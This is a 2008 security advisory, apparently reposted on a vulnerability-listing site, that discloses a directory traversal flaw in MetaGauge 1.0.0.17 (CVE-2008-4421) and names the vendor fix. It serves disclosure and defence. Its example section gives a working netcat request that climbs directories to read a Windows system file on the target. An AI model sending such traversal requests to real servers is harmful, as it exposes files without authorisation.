Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability

  CMME Multiple Information disclosure vulnerabilities

  iFoto, CSS-based GD2 photo gallery <= 1.0: Remote File Disclosure Vulnerability

  Website Directory - XSS Exploit

From:Brad Antoniewicz <brad.antoniewicz_(at)_foundstone.com>
Date:06.10.2008
Subject:MetaGauge 1.0.0.17 Directory Traversal

Title: MetaGauge 1.0.0.17 Directory Traversal

-------------------------------------------------------------

Vendor: Hammer Software

Vendor URL: www.Hammer-Software.com

Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.

Description:

A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote
user to view files local to the target server.

Example:

C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1


Patch Information:

Hammer has addressed the issue in the latest version of MetaGauge:

http://dl.hammer-software.com/metagauge.zip

CVE:  CVE-2008-4421

Credit:

Brad Antoniewicz

brad.antoniewicz@foundstone.com

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server